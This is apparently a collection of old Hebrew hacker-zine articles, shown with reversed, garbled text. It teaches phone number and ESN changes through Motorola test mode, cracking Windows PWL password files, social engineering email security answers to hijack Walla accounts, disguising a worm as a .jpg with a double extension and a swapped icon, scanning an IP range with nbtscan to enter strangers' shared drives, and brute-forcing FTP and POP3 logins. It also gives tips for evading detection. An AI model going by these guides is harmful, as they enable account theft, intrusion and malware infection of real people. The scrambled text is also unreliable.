'ה ךותב םידוק Test Mode
''''''''''''''''''''''''
01# 'ה רותפכ ומכ הדוקפ התוא' .ןופלה תא חתופו רגוס ' pwr .
03# .ימונוואה ןמזה תא ספאמ '
04# .ליגר בצמל ןופלה תא ריזחמ '
05# לילצ ' TX .הלעפה (
06# לילצ ' TX .יוביכ (
07# ' RX .יוביכ (וידוא
08# ' RX .הלעפה (וידוא
09# ' TX .יוביכ (וידוא
10# ' TX .הלעפה (וידוא
)!ורע(< 11 דע לע דבוע .םייוסמ !ורעל לוקה תא ריבעמ ' 4 .םירפסמ
)הגרד(< 12 ( .תמייוסמ הגרדל למשחה תמצוע תא ליעפמ ' 1,0-7 .) 0 ( האלמ המצוע- 3 .)אוו
13# .וידרה תא קיתשמ '
14# ' 10kHz .הלעפה (
15# ' 10kHz .יוביכ (
28# ( םיהובג םירדת תלעפה ' 1150Hz +/- 55Hz .)
29# .םיהובג םירדת יוביכ '
30# ( םיכומנ םירדת תלעפה ' 770Hz +/- 40Hz .)
31# .םיכומנ םירדת יוביכ '
32# דוע לכ ןופלה תא תובכל רוסא (תוקד המכ חקול' !!לכה קחומ ' !ןופלה לכ תא הקנמ '
רפסמה תא שי 32
.ןופלה תא תובכל רשפא (דרוי רפסמהש עגרב .ךסמה לע
)רפסמ(< 35 .ןופלה לש בצמה ' 0 (ןופורקימ- 1 (לוקמשר- 2 (העדוה- 3 (ליגר- 4 .קתשה-
45# ' ה תא הארמ ' RSSI .
46# 'ה תא הארמ ' Call Timers .רבצמה
61# תרבעה ' ESN .
62# .לוצליצ ליעפהל '
63# .לוצליצ תובכל '
םיפסונ םירפ
''''''''''''''
99+
שיקהל שי (" הארמ ןופלהש בצמל םיעיגמשכ .% שקמב שמתשהל שי #דפדל ידכ 01# יידכ
.ןופלה תא תובכל
01 .תכרעמ רפסמ '
02 .תונכת תורשפא '
03 .תמודיק םע ןופל רפסמ '
04 ' Station Class Mark .
05 ' Access Overload Class .
06 .הצובקה לש רפסמ '
07 ידוסה דוקהו החבאה דוק ''''''' 2 .החבאה לש דוק '
08 .לוענ אוה םא החיתפל .ןופלה לש ''''''' 2 .ידוסה דוק '
09 .החבא תגרד '
10 .תונכת תורשפא '
11 .תונכת תורשפא '
12 ' Initial Paging Channel .
13 תכרעמ ' A .
14 תכרעמ ' B .
15 ' Number Paging Channel .
16 .תונכת תורשפא '
ןופלה רפסמ יוניש
'''''''''''''''''''
.תשרה לש תמודיקה תא ינפל תעדל ךירצ (ךלש ןופלה רפסמ תא תונשל ידכ
'ב לשמל ליחתמ ךלש רפסמה םא 050 איה תשרה לש תמודיקהש רמוא אל הז 050 .
( םיצור םתאש תמודיקב ליחתמש ןופלל וכל (תמודיקה תא קודבל ידכ 050,051,056 < וצחלת ()
RCL (
.םשור ןופלהש תמודיקה תא וארתו
( % 11101100 ( %( FCN 00``83786633 STO #, 55# .
הזיא( % לע !חלתו (שדח רפסמ םושרת' .ךלש ןופלה רפסמ תא םושר הייהי גצה לע 15 )םעפ
בצמל עיגתש דע
!חל (תעגהש עגרב .ךסמה לע " םושר הייהיש 01# שי וישכעו (ןופאלפה תא ליעפהלו רוגסל יידכ
.שדח רפסמ ךל
ןופלה ךרד תשרל ויצ
'''''''''''''''''''''''
אל ינאו (הז תא יתקדב אל ןמז הברה .ךלש תשרבש ןופלל ויצ
..הז ךיא יל ודיגתו וסנת ...דוקה הז לבא (דבוע הזש חוב
< FCN 00``83786633 STO # 11300 # 08
MOTOROLA GSM
'''''''''''''''
'ה תא קדובש דוקה אוה (דבוע תמאב אוהש דיגהל לוכי ינאש דיחיה דוקה ..ןורקיעב IMEI
#06# .%
15 ( .תשרה ךותב ךלש וקה תא תוהזמש תורפס XXXXXX (TAC) XX (FAC) XXXXXX
(SNR) X (SP
..יתרזע שממ אל ןאכ זא
(הרקמ לכב
...ייב ..םכל ונהת
ZiroCool
999
( לא.ואילבד.יפ יצבק PWL FILES )


(הלעפהה תכרעמב םשומיש המ (לככיב הלאה םיצבקה הז המ םכל ריבסא ינא זא (םולש
.לכה ריבסא ינא רוציקבו ( ללכיב םתוא ךירצ םיאה (םהילע ןסכואמ עדימ הזיא
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
:!בוקה תא ריכהלמ ליחתנ זא

:סודיוו הלעפה תכרעמ םכל שי םא היהי דימת ולש םוקימה
C:\WINDOWS

:היהית דימת ולש תמויסה

x.pwl
רשאכ X רוציקב (םושירה בלשב וא סודניווה תנקתה תעב םתרחבש שמתשימש םש -
.לאיריסה
( סודניוו יתנקתה :המגודל win9x רפסימה תא יתמשר םושירה בשלשל יתעגהשכו )
םשב יתרחב .ילש םשה תאו ירודיס ןוישיר example ה !בוק זא 7 pwl ארקינ ילש
example.pwl .ןורקיעה תא םתנבהש בשוח ינא
:וילע ןסכואמ המ
'''''''''''''''''''''''''''''
(םעפ ייא םתמשרש תואמסיס (סודניוו לש תואמסיס (תשרל הסינכה לש תואמסיסה לכ
( ןימדיא תואמסיס admin (תשרה ךרד והשמ הנק םדאנבה םעפ םע יארשא יסירכ ירפסמ ()
.הלאכו םילמיא תונובשח חוריא תואמסיס המודכו רומשי בשחמהש ונרמאש םירתאל תואמסיס
:הרעה!
!בל םישל
'ה יצבק PWL םימשור םיצבקה םגו (םירתאה לש תואמסיסה תא םירמוש
'ב בותכש המ םמצעל COOKIES $תויגוע$ יצבק ןיבל לא.ויאלבד.יפ םיב ולידבת זא !
:הזכ !בוק יל ןתי המ

( וילע ןקתומש בשחמ לכב הז וצרת אל וא וצרת (לכ םדוק זא win9x .)
(רחא לש הזכ !בוק םתגשהש וא והשימ לש בשחמל םיצרופ םתא םא
תשר תואמסיס (גניסוה ' חוריא תונובשח (לימיא תואמסיס גישהל ןתינ (!בוקה חוציפ י$ע
!בוקה תא םיחצפמ םא רפס תיבב הז שומיש דוע (םשר אוהש תואמסיסה לכ רוציקבו
admin.pwl .
:תואמסיסה תגשה

םג םיכירצ םתא !!בוקה תא םכל שיש ךכה קיפסמ אל הלאה תואמסיסה לכ תא גישהל תנמ לע
םימעפל יכ (האירק רמוא ינאש תונכיתל ןווכתימ אל ינאו !ותוא אורקל וא ותוא חצפל
ב הנכות י$ע אורקל ןתינש םיצבק שי תמאב C ( רוידא וא )) editor תונכית תפש ךרוע ' )
.תרחא
993
םינותנ גיצהלו םגו (הלאה םיצבקה תא אורקלו םגרתל תועדויש תונכותל ןווכתמ ינא
(ונלש הפשב
:תואמסיסה תא גישהל תנמ לע חוציפ יגוש ינש םימייק
1 דואמ (תוינש ךות תואז םישוע םה בו יכה הז יתעדל (םתוא תומגרתמו תוארוקש תונכותה )
.הזב שמתשימ ינא !למומ
2 םהלש ןורסיחה ךא !םג תולועמ םה (ילורבה חוכב שומיש תושועה חוציפ תונכותב שומיש )
!תובו תועש המכ וליפאו ןמז ןומה חקול הזש
&!םירקארקל םירזעה תניפב דירוהל ןתינ םיגוסה ינשמ תונכותה יתש תאש ןייצל שי5
:ומצע חוציפה

הביסמ חצפל קוידיב ךיא ןאכ ריבסא אל ינא (םכל חונש המ (תונכותה תא ודירות 1 :
.םש שיש המ תוארוהה יפל םיכלוהו !בוקה תא םילעמ םתא !לק שממ הז !ריבסהל המ ןיא
םתוא וחצפתש ירחא (ליחתמה שמתשימל םג לק קממ קשיממ תולעב תונכותה (רוציקב
תותשר (םילמיא (םירתאל תואמיס (וארת םתא לא.ויאלבד.יפה !בוק ליכמש המ לכ
.םכל יתרכזהש המ לכו(
ה תא שחנל םיכירצ םתאש חוציפב ןורסיחה User ! רוזעיש והשמ םכל יתאצמ ינא לבא (
םיפיב ולכתסית
TIPS :
1 ה תמויס ינפל אוביש המ לכ (עלמל יתרבסהש יפכ ללכ ךרדב ) file.pwl (שמתשימ םשה הז
user יתמשרש ומכ )
!המגודב עלמל
2 אוה רזויה ללכ ךרדב (הלאכו (תוירפיס (םיתיב תותשר (רפס יתבב ). admin .
3 !בוק חצפל םיצור םתא םא ) pwl +רזוי ושחנת ךיא (וילע םידבוע םתאש בשחמב אצמנש
לע !םיצחול אל לבא םיעיבצמ (דואמ ושפ
( יתנקתהש (הלחתהב יתמשרש ומכ (המגודל םושר היהי זאו . קותינ.לחתה win9x )
לע שמתשימה םש תא יתמשר example הז ילש שמתשימה זא example .
קותינ וארת םתא example .םכל חיכוהלו ...
ב אצמנ קותינב בותכש השמש וארתו .םכלש רזויה הז סודניווה תא םתנקתהש םש הזיא
pwl , ןוישירב םכל םתתנש םשה. C:\WINDOW

םש לע וארתו .יללכ םש ושעת.םיניפאמ.רבכעה לש ינמי קילק.ילש בשחמל וכל :היש דוע
םושר בשחמה ימ
( שמתשימ' רזויה הזו user .)
שממ אוה ןיבה אלש ימ זא (רופמ תמאב לבא !יוושמ יתייה אל (בו (ינלק אצי הזה סקה
.רגפמ
! םכלש הייעב םתקפדינ םאש ורכזתו (תויוש ושעת לא (ונהת זא
patcher
99:
דועו (ייס (ראוד הללאו תונובשחל תמכחותמ ךרדב הסינכ


#ושחל ךיא תמכחותמ ךרדב ריבסי ושפ ינא !!ורפל ךיא ןאכ דמלי אל ינא
עונמב םינתינש םניח םיתורשה לכו (םש רתא ןוסכיא (םינמוי (ראוד תונובשח לש תואמסיס
לודגה ילארשיה לרופהו שופיחה
www.walla.co.il
הבושתה תאו אמסיס ריכזמה תא תולגל םיכירצ םתא

.םכל אבש המ ושעתו ןובשחל אמסיס ולבקת ןוכנ ונעת םא
םש רתא ןסכאמש ימל ומכ דובעי םש תורש לכ דבוע הז םאש לימיאל הסינכמ ליחתנ

ומשרי םישנא ללכ ךרדבש תולקב תובושת גישהל רשפאש תוצופנ אמסיס תולאש
:ריכזמ רותב
םימשורש םישנא שי (אמסיס תלאש רותב םהלש אמסיסה תא םימשורש םישנא שי
(ילש רבחל וא הרבחל םיארוק ךיא 4 לזמה ירפסימ (תוהז תדועת לש תונורחא תורפס
שיו( רקוב לכ התוש ינא המ ( הקיסומ (תינוכמ (םש (ןופל ()אל רבכ הז ותוא הלגנ םא( ילש
.דועו)הלאכ דוע( דבוע ינא המב )הלאכ םירגפמ
ולאשת אלש ןבומכ '.החירסמ "צ תחיש לוהינ ידכ ךות תולגל םילוכי םתא הז לכ תא
ולאשת אמסיס ריכזמל ועיגתשכו אל אל (תיתוברת החיש ולהנת !הז לע רשי ותוא
.ותוא
%%%%%%%%%%%%%%ךשמהב הז '+אמסיס ריכזמל עיגהל ךיא %%%%%%%
:ללכיב בו הז המל
.םכתא לילפהל לוכי אל דחא #אש ךכ גניקאהב עדיו רזע ילכב שומיש אלל תיקוח ךרד תאז .א
!תיקוח ךרדב תכרעמל םתסנכנ
.ול !ורפל םיכירצ םתאו רתא חראמש וא לימיא םש שי והשימל םא .ב
mail.walla.co.il

.תוצירפב עדי אללו םילכ אלל תיקוח ךרדב רחא ןובשחל הסינכ


םיגישמ הפיאמ :

אבש רתא םש ןסכאמש ימל וא רתאב ןובשח םש ול שיש ימ םא לכ םדוק חחושל ךירצ התא
ול !ורפל ךל
99=
הלאכ םישנא םיאצומ הפיא :

םתאש תוארח םתס וא םיבורק (םיחא (םכלש םירבח תויהל לוכי הז (ךכ ךלוה הז זא (בו
רוציקב םש ןובשח ול שיש ימ .םתיא םירבדמ
:םהל תויהל ךירצ המ

רתאב רתאב ןובשח

http://walla.co.il
!עדוי אלש ימל!


:קוידיב ךירצ התא םירפ הזיא

תינורקלא ראוד תבותכ

אלמ הדיל ךיראת

:א דעצ
ב םתא םאו (ולש הדיל ךיראתה המ החיש ידכ ךות (ותוא ולאשת זא ICQ והשמ וא
.םשר אוה (ולש שמתשימ יירפבש תויהל לוכי זא (הזכ
:ב דעצ
ינא לבא (אמסיסה תאזש תויהל לוכי ( ומש תא וא (ולש יוניכה תא םימשור
וסנת וא .אמסיס ריכזמ תולגל ךיא הלא ( אמסס !ורפל ךיא ןאכ דמלמ אל 1234 .
:ג דעצ

:האבה תובותכל םיכלוה


mail.walla.co.il


+ולש לימיאה תא םכל שי

..)!יפוי ןכ םא

ולש לימיאה

fuck¡walla.co.il

: שמתשימה םש fuck

.שמתשימ םש הז $=$ןמיסה ינפל אוביש המ לכ :רוציקב

+םירכוז אלמה ולש הדיל ךיראתה תא גישהל םיבייח םתא
+התא לזמ הזיא :ותוא ולאשת
99J

:דיגי אוה XXX

+הדיל ךיראתה המ ..ךכ ינא םג +תמאב המ :םתא

:אוה X.X

+הנש הזיאב :םתא

.הדילה תנש תא דיגי :אוה
....היגולורסאב םינינעתמ םתאש ול ודיגת :הדיל ךיראת יוליגל היש דוע

ראודה אל ( רתאה תבותכ ' ( הלעמל יתנייצש תבותכל םיסנכנ


:ד בלש
$אמסיס יתחכש $ :םישועו (םכל יתרמאש ומכ 'שמתשימ םש םימשור
םש שיש המ וא רושיא זאו (הדיל ךיראתו שמתשימ םש בוש םימשור
.ראודה ןובשחל אמסיס ולבקת ןוכנ ונעת םאש הלאשה היהית ךכ רחאו
.הרהבה (הלחתהב יתמשרש המ ןונגסב עיפוהל תולוכי אמסיס תולאשה
ילש אתבסל םיארוק ךיא :המגוד
ךלש אתבסל םיארוק (יחא$ :ותוא ולאשת X $
+המל ( אל :אוהה
םתס הז אתבסה םע עקהו( אמסיס תלאש לש הבושתל ותיא ועיגת רוציקב
.הרהבהב יתמשרש המ ומכ םלועבש אשונ לכ לע תויהל לוכי הז
.ולבקתו (ומשרת

patcher

99N
Adware
ןוישר תחת תולעופ ונמיב תובר תונכות Adware (םיביכר תוניקתמ ולא תונכות .
( ונירחא לגרל םג םילוכיו תומוסרפ ונל םיארמש Spyware .םתוא וריסת ךכ .)
(הנכות ריסהל ידכ .תומוסרפ הגיצמש (הנכות לכ תינדי ריסהל ושפ איה (הנושארה הישה
""'ל ושג Start'', ''Settings'', ''Control Panel .""
"" לע הלופכ הציחל וצחל Add/Remove Programs (ריסהל םכנוצרבש (הנכותה תא ונמס .""
"" לע וצחלו Add/Remove .""
חישקה קסידה לע תושמש (הקירס תנכותב שמתשהל איה רתוי החובהו הינש הישה
(םכלש
םירושיקהמ דירוהל ולכות (תונושה תונכותה תא .תמוסרפה ביכרל םירוכזאה לכ תא הדירומו
.םיפרוצמה
.תומוסרפה יביכר תא םתדרוהש רחאל ודבעי אל תומיוסמ תונכותש (בל ומיש
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''
:םירושיק
:לוגירה תא תוריסמש תונכות
OptOut: http://grc.com/files/optout.exe

AdAware: http://www.lavasoft.de/BINARY/awbin/aaw45.exe
patcher
99.
תוימינונא
20 :דשחהל אלו ימינונא תויהיל ידכ םיבושח םירבד
1 גניקאהה םלועב ךלש םשה תא תתל אל םייחב .
2 :ךכ ותוא תושעל אל ךא (יפ ייא #ייזל . 0.0.0.0 יתימא הארי הזש ושעת (
3 תשרב םירוסא םינכת תולעהל אל .
4 סק ךמסמב תועדוה ינימ לכ ריאשהל אל (בשחמל !רופ התאשכ .
5 )...הז תא תושעל רשפאו( ולש תספדמה ךרד סיפדהל אל (בשחמל !רופ התאשכ .
6 ךתוא ופשחיש תועדומ ריאשהל אל (רתאל !רופ התאשכ .
7 קיתעת קר (םולכ ול קחמת לא םלועל (בשחמל !רופ התאשכ .
8 :םיצבקל הזה םשב שמתשת(תשרל םירוסא םינכת הלעמ התאשכ . my_wedding ינימ לכו
הלאכ
ךלש תויתימאה תונווכב ןיחבי אל תרשהש ךכ
9 ..אמא ינפל בהלתהל אל םג (רקאה התאש םירבח ינפב בהלתהל אל .
10 'כ והדזת לא (#יוזמ ראוד םיחלוש םתאשכ . hacker
11 םכתוא ריכי אל דחא #אש (הכומנ הדמעמב רתויש המכ תויהיל .
12 ןומושיר םכל שיש הז לע ורבדת לא !!םייחב .
13 ליג ודיגת לא .
14 םייחה תא ברעל יאדכ אלש ללגב (םירקאה םתאש ודיגת אל םעפ #א םכלש םירבחל .
םיישיאו םייתרבחה
הנוש םלוע םתא םירבחה םעו הנוש םלועב םתא בשחמב .גניקאהה ייח םע
15 רתא םיקהל אל ולדתשת .
16 תילגנאב תרשל דימת הז תא ולעת (תירבעב גניקאה רתא םיצור םתא תאז לכב םא .
17 םכמצעל וארקת לא לשמל .םכמצעל #שוח אל יוניכ איצמהל . T0m3R םיעדוי זא יכ ...
םכמצעל םיארוקש
...רמות
18 ןרע םכמצעל וארקת (לג םכל םיארוק םא לשמל .םכירחא םישפחמש הלא תא תועהל וסנת .
...!יבושולימ
19 גניקאהה םלועמ תישיא והשימ םע שגפיהל אל םייחב .
20 לביהל אל .
GOLGOLET
99;
Faking File Transfer

(ייקוא
.הככ ליחתנ
.ןגרואמו ןבומ רתוי היהי הז הככ (אלמ ךסמב הזה !בוקה תא ולעת ןושאר רבד
(קאינמ הז המ דלי קופדל םתיצר ךכ לכ םתאש דיגנ
.!בוק םוש לבקל הצור אלש קאינמ הזכ אוהו
(םירמוא םישנא הברה זא
$התוא ונלכא (יש וא$
$!אל םתא$ :רמואו אצוי ינא (וישכעו
(ושפ דואמ ליגרת הז
(ותוא תולגל רשפא לבא
): ..םישפי םג ללכ ךרדב םה םיקאינמ םישנא (תאז לכב לבא
:םישוע ךיא םכל ריבסא ינא זא
'- תורחא תונכותבו ויקיסייאב םיצבק תחילש #ויז -'
(הככ ךלוה הז
(הנ%ז'ן% !בוק רוחבל םיכירצ םתא (ןושאר רבד
.)םירקאהה לש תופקתמהמ( ..תושדחה םיעלותה תחא תא (דיגנ ואוב
(הנכות ורחבת
(ויקיסייא דיגנ
:שיאל ודיגת
(!!!!יל שי המ הארת !ייה$
$!אלכב הכוב רזילאנאה לש הקיחצמ וז המ הנומת יל שי
% קאינמה בל"ת לכאיש זא (הז תא ול עיגמו קאינמ אוהש וחכשת לא (דואמ בושח :הרעה %
:הככ ותוא תונשל וליחתת זא (!בוקה תא תחקל ךלוה אוהש םיעדוי םתאשכ (וישכעו
:ומכ והשמל !בוקה לש םשה תא תונשל ןושאר רבד םיכירצ םתא
$ Prison Hacker.jpg .exe $
+םתנבה
. זאו (םיחוור א'ל'מ ושעת (הנומתה לש םשל םכלש תעלותה לש םשה תא וריאשת קר exe הככ (
בצמב !בוקה ראשיש EXE .
קר הז וליאכ הז תא הארי אוה (!בוקה תא ול וחלשתש (וישכעו Prison Hacker.jpg אל אוהו
הזש עדוי EXE !!
חחח
.וילע םתדבע
.יתריצי רתויה קלחל וישכע
93*
הנכותה תא ודירות MicroAngelo
ה !בוקה לש למסה תא ודבעת הנכותבו EXE .הנומת לש למסל
לבקי אוה (הנומת וזש בשוח אוהש (#ייוזמה !בוקה תא לבקי שיאהש (וישכע EXE (
לע$ #וח קאינמה זאו (!בוקה תא הלעי אוה זא (הנומתה לש ןוקייאה הזל ראשית (ןיידעו
.םכלש סוריוה תא ($םינפה
+הפי
.אצי רבכ אוה זא דעו ותוא ןיכהל הנש םכל חקי אלש ינפל !בוקה תא וניכת םיצור םתא םא
.םילמסו תומש ייונישב םיקאינמ םישנא לע ודבעת ושפ זא
GOLGOLET
ל הצירפ WINDOS
)...סודניוול םינווכתמ םה ןבומכו( םיבשחמל !ורפל ךיא יתוא םילאוש םישנא הברה
''''
.םיבושח םירבד המכ דועו הז תא םכתוא דמלא ינא הזה ךירדמב זא
ינא ויקיסייאב !!!!!תחא הנולת עמשא ינא םאש הככ רופמ ךכ לכו אלמ ךכ לכ היהי ךירדמה
...עגתשי
!ישיאה םכנוחבל !!רהזיהל אנ
ןכות
1 בושח דואמ ילככ עדי .
2 םיפותיש ןיקתהל ךיא רבסה .
3 םיפותיש םע בשחמ קורסל ךיא.
3 !ורפל ךיא .
5 ...והשמ יתוא לאשיו םוקי דחא והשימש עדוי ינא יכ ...ילש תונבצעתהה .
1 /// בושח דואמ יללכ עדי ,,, .
סודניוו לש ירפ בשחמל הככ םתס !ורפל םילוכי אל םתא .תואלפנו םיסינ ןיא
םיסינ םכל השוע וזכש הנכות גישהל םילוכי אל םתא .םיפותיש ילבו !בוק ילב
...םתצרפ (רותפכ לע םיצחול זאו ןברוקה בשחמה לש יפייאה תא םיבתוכ םתא םאו
...םינאיור םע םג והשמ םיעדוי אלש ולאו םיפותיש ךרד !ורפל םילוכי םתא סודניוול
2 .םיפותיש ךרד סודניוו לש בשחמל םיצרופ ךיא םכתוא דמלא ינא ךירדמב .
.$תשרב םינכש$ ונעי םהל שיש םישנאל !ורפל םילוכי םתאש תרמוא תאז
.שי דחא לכל אל יכ (דחא לכל !ורפל םילוכי אל םתא ןכל
שממ םתא .ולש בשחמב םיפוצ םתא וליאכ הז םיפותיש ךרד םיצרופ םתאשכ
...םכלש תא םיאור םתאש ומכ לכה תאו ולש תויקיתה תא םיאור
!!!בוק ילב לכהו
)': ....ןאיורב אלו תיעוצקמ רתוי הרוצב !ורפל ודמלת הככ
...םיפותיש םכילצא םג ןיקתהל םיכירצ םתא )$תשרב םינכש$( םיפותיש ךרד !ורפל ידכ
...ינשה בשחמל לבכב רבחלו #סונ בשחמ תונקל יתנווכתה אל !אל אל
+הז תא םישוע ךיא זא (בו
)...הזה #יעסה תא אורקל ךירצ אל תשרב םינכש רבכ שיש ימל(
םינקתומ ויהיש םיאבה םיניילק,םילוקוורפ,םירביירדה תשולש תא םיכירצ םתא
:םיפותיש םכל היהיש הככ בשחמב
93+
NetBeui
TCP/IP
Client for Microsoft network
.תשר.''''הרקב חול .'''ילש בשחמ.''''ל וכלת
...םינקתומ םכלצא תויהיל םיכירצש םירבדה םא וקדבת
.םכל רסחש המ תא ןיקתהל םיכירצ םתא (דחאמ רתוי וא(המישרב אצמנ אל דחא םא
+םיניקתמ ךיא
...רפ לכ םיניקתמ ךיא ןאכ םכל רפא ינא

NetBEUI

תשר.'''הרקב חול.'''ילש בשחמל ןכל
.$הפסוה$ לע וצחלת
.$לוקוורפ$ לע וצחלת םכל העיפומש המישרב
ורחבת microsot ורחבת זאו (םינרציה לש המישרה לכ ךותמ
םיירפה לש המישרה ךותמ NetBEUI ...לכהו רושיא וצחלת .
לש קסידה תא שקבי הזש תויהיל לוכי .ןיקתמ הז וישכע Windows .אל םימעפל לבא
.םתרמג
TCP/IP

...הזה לוקוורפה תא שי עמכ דחא לכל
...ריבסי ינא .ונ לבא
.תשר.'''הרקב חול.''''ילש בשחמל וכל
.לוקוורפ ורחבת ךכ רחא םכל העיפומש המישרה ךותמו (הפסוה לע וצחלת
ורחבת microsoft ךכ רחא ורחבתו םינרציה תמישר ךותמ TCP/IP תמישר ךותמ
קסידה תא םכמ שקבי הזש תויהיל לוכי .ןיקתמ הז יכ וכחתו הלאכו רושיא וצחלת .םיירפה
לש windows .והז םתנקתה יפוי ונ .
client for microsoft network
....הזה ירפה תא רבכ ול שי ($תשרב םינכש$ לש למס שיש ימל
.תשר.'''הרקב חול.'''ילש בשחמל וכל ייקוא
.םכל האבש המישרה ךותמ $חוקל$ לע וצחלת ןכמ רחאלו הפסוה רותפכה לע וצחלת
'ב ורחבת microsoft 'ב ורחבתו םינרציה תמישר ךותמ client for microsoft network
.םכל ןיקתי הזו םימעפ המכ רושיא וצחלת .םיירפה תמישרב
םכמ שקבמ הז םא CD לש windows ...קסידה תא ומיש ושפ
.בשחמה תא שדחמ וליחתת
:הקירסל וישכע ...םיכירצ ונחנאש המ תא ונקתה יפוי
3 הנכותה תא ודירות . nbtscan .סודניוו תייקיתל פיזב םיצבקה לכ תא וקיתעת .
939
ומשרתו סוד תא וחתפת nbtscan 213.57.123.1-255 .
'מ םיפותיש קרוס הז השוע הזש המ 213.57.123.1 'ל דעו 213.57.123.255 .
...םירבד הברה םכל אצמי חוב הזש הככ
.הלב ןימ םכל העיפומ
2 ולש םשה דיל בותכש בשחמ ושפחת server 2'ל ינמיה דצמש !םגו! . server היהי אל .
םושר unknown .
:הככ הארנש הלבב בשחמ שפחל םיכירצ םתא רמולכ
LIRON <server> LIRON
אלו
LIRON <server> unknown

...אבה בלשל ורבעת הזכ בשחמ ואצמתש ירחא יפוי זא
4 התוא עצבל ךיא םדוקמ ונדמלש הקירס תרזעב םיפותיש םע בשחמ וגישת .
ארקנש סודניוו תייקיתב סק ךמסמ וחתפת hosts.txt
.הלעפה.''''לחתהל וכלת
םש ומשרת hosts.txt .
.#תושמה בשחמה לש יפ ייאה תא ןימיל לאמשמ ומשרת סקה ךמסמב
.ךמסמה תא ורמשת
.בשחמ.'''שפח.'''לחתהל וכלת
.#תושמהו ןברוקה בשחמה לש יפייאה תא םש ומשרת
...בשחמ םכל אצמי הז ןמז המכ ירחא
םירבדה לכ תא םכל חתפי הזו בשחמה לע םיימעפ וצחלת
+אל לודג ...ולש בשחמב םיפתושמה
...םתחלצה #וס #וס יפוי
5 דועש דע תוכחל חכ יל ןיא יכ שארמ ןבצעתמ ינא וישכע .
.הנשמ אל בו ...יל ועירפי םעפ
GOLGOLET
933
ויקיסייאה ךרד םישנא לש יפ ייא גישהל ךיא
1 ושעת . chat םתיא
2 ומשרת (סודל וסנכית . netstat -n
3 רופהש יפ ייאה תא ורחבת .יפ ייא לש המישר םכל ןתונ הז .
אל אוה ולש 80 וא 21 לש יפ ייאה הארנכ אוה םתרחבש יפ ייאה .
.ןברוקה
GOLGOLET
הינש היש
הנכותה תא דירוהל

,P $etector

http://www.reshet3000.com/ipdet.exe
HFM
93:
'ב םיצבק לוהינ FTP סוד ךרד
םושבו ירוקמ דואמ אוה םכל גיצמ ינאש יחכונה ךירדמה
...הז לע םירבדמ אל ריכמ ינאש רתא
...שדח עדי םכל #סוותי תמאבש הככ
תנכות תויהיל דמלנ הז ךירדמב FTP ומכ לשמל : CuteFtp 'ו WS_FTP .
.תינדי קר ' םישוע םהש המ השענ שממ
...ייקוא
...ממממ ...ב רתא םכל שיש דיגנ IOL .
'ל םכלש רתאה לש םיצבקה תא תולעהל םיצור םתאו FTP .
!!הייעב שי לבא
'ה לש תונכותה לכ FTP רבע יכ ורמגנ )...דיגנ( םהב םתשמתשהש 30 !םוי
+םישוע המ זא
תא םיחתופ MS DOS Prompt הדוקפב שומיש י$ע סודב רתאה לש הייקיתל םיעיגמ ( CD .
:איה בשחמב םכלש רתאה לש הייקיתה םא לשמל
c:\mysite
סודב ומשרת זא
ושעת( Ctrl+Shift )הנוכנ הייפצל ךסמה לש ילאמשה דצב
cd c:\ <enter .
cd mysite <enter .
...םכלש רתאה לש הייקיתב םתא וישכע ייקוא
:הככ ומשרת
ftp server.com
'ב אוה םכלש רתאה םאש תרמוא תאז IOL :הככ ומשרת זא
ftp members.iol.co.il
+שמתשמ םש םכמ שקבמ וישכע הז ייקוא
.רתאל םכלש שמתשמ םשה תא ומיש
93=
:אמסיס שקבמ הז וישכע
.רנא וצחלתו םכלש אמסיסה תא ומשרת
רבד לש ופוסבו םכל עידוהל רומא הז ןוכנ םתישע םא
:הזכ והשמ םכל שי
2 ftp .
+ןוכנ
...ייקוא
ושעת dir תייקיתב ללכב םכל שי המ תוארל ידכ FTP .
:אלמ וריפ םכל שי
קוידב !בוקה לדוג
!בוקה רפסמ
!בוקה םשו
.בו עדימ
+םילעמ ךיא וישכע
םימשור
put index.html
...אמגודל םתס
םישל םג םילוכי םתא
put blabla.zip
...רחא !בוק לכ וא
תא דירוהל םיצור םתא לבא index.html
'המ FTP : .......הככ םתס וליפא .
get index.html
.םכלש רתאה לש הייקייתל !בוקה תא דירוהל רומא הז
( +םייניר םישוע ךיא וישכע rename ++)
:הככ םימשור
rename index.html<enter .
main.html
' מ םשה תא הנשמ הז הככ index.html
'ל main.html
'המ םיצבק קוחמל ךיא FTP +
:הככ םיקחומ
delete index.html
93J
'ב תרחא הייקיתל רובעל ידכ FTP
הדוקפב ושמתשת ושפ cd ....
(םיצבקה לש םשה תא תונשל (םיצבק קוחמל(םיצבק תולעהל םיעדוי םתא וישכע ייקוא
.תויוצר תויקיתל רוסבעל
.יפוי
...תודוקפ דוע םכתוא דמלא ינא וישכע
help תרשב שמתשהל ןתינש תודוקפה לכ לע עדימ ןתונ '
dir הייקית הנשמ '
rmdir רחא םשל הייקית לש םש הנשמ '
quit 'המ אצוי ' FTP
mput דחיב םיצבק המכ תולעהל '
mdelete דחיב םיצבק המכ קוחמל '
mget דחיב םיצבק המכ דירוהל '
mkdir הייקית רוציל '
disconnect קתנתהל '
ls ותואב םיצבק לש המישר ' FTP
GOLGOLET
93N
'ב ילורב חוכב שומיש wwwHack (םירתאל !ורפל ידכ
יתרש FTP ינורקלא ראוד תוחוקלו
...תובר םישלוג תושקב תובקעב בתכנ סקה
ישפ יד הזש בשוח ינאש תורמל (סקה תא יתבתכ ןכל
:םילכ
1 לכש .
2 . wwwHack
3 ילורב חוכ לע סקה תנבהו האירק .

:ןכות
1 הנכותב יסיסב שומיש . wwwHack
2 'ב תופסונ תויורשפא . wwwHack
3 הנכותה תא םידירומ הפיאמ .
1 .התוא וחתפת (הנכותה תא םידירומ םתאש ירחא .
....םכל שי המ הארנ ואוב
ירפת הנכותב שי file,access,options,tools,help .
...ןכותב תולולכה תויורשפאה המ הארנו דחא דחא רובענ אוב

file תויורשפאה קר םכל דיגא ןכל הזה ירפתה תא םיריכמ ונלוכ '
:ירפתב הנכותל תודחוימה
site list תואמסיסב רכזיהל ולכות ךכ (האצמ רבכ הנכותהש תואמסיסה לכ םירמשנ םש '
.םתחכשו םתאצמש
misc goodies--->attack server ...תרשה תא #וקתל םג תורשפא ןתונ '
access חכה תא עצבל םיצור םתא הפיא רוחבל םילוכי םתא ןאכ .הנכותב בושחש המ לכ הז '
ילורבה
.#יקתהל םיצור םתא תרש לש גוס הזיאו
93.
POP3 .םישנא לש ינורקלא ראוד תואמסיס תולגל תורשפא םכל ןתונ '
תא םימשור םתא הבש (סק תבית םש םכל שי .וזה תורשפאה לע וצחלת
